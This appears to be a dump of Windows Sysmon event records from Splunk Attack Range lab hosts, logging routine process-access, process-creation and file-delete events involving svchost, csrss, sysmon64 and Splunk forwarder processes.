12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019116Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019115Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019114Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019113Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E6A4-63C7-4702-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000019112Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.358{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E6A4-63C7-4702-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000019111Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:32.359{E5A8D418-E6A4-63C7-4702-00000000B002}3680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000048887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.827{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E6A5-63C7-AA06-00000000AF02}8020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.821{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.821{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.821{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.803{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.803{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E6A5-63C7-AA06-00000000AF02}8020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000048881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.803{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E6A5-63C7-AA06-00000000AF02}8020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000048880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.804{FE4C2B44-E6A5-63C7-AA06-00000000AF02}8020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000048879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.372{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=203D87BFA91EF8B1879CCAC781243AED,SHA256=966D1D23BBAB7A3DF02943788B10B8044F84DC0F51444E1138AC287AFFA208D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000048878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:31:33.271{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9EBEC0AD320FB3FAD5FFD025F4954C,SHA256=B3FA6FADDE1CD5EC5B4A246453EFD9882F6EDE96C43C500FA0D0858CA9A568B7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000019153Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E6A5-63C7-4902-00000000B002}3580C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019152Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019151Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019150Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019149Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019148Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019147Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019146Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019145Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019144Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019143Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:31:33.949{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E6A5-63C7-4902-00000000B002}3580C:\Program 